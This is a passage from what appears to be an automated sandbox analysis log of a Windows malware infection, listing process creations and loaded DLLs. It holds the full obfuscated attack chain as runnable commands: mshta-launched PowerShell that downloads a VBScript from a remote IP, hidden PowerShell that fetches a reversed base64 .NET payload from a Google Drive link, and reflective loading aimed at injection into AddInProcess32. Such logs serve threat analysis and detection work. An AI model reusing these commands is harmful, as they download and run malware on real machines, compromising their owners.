3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
Source: C:\Windows\System32\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
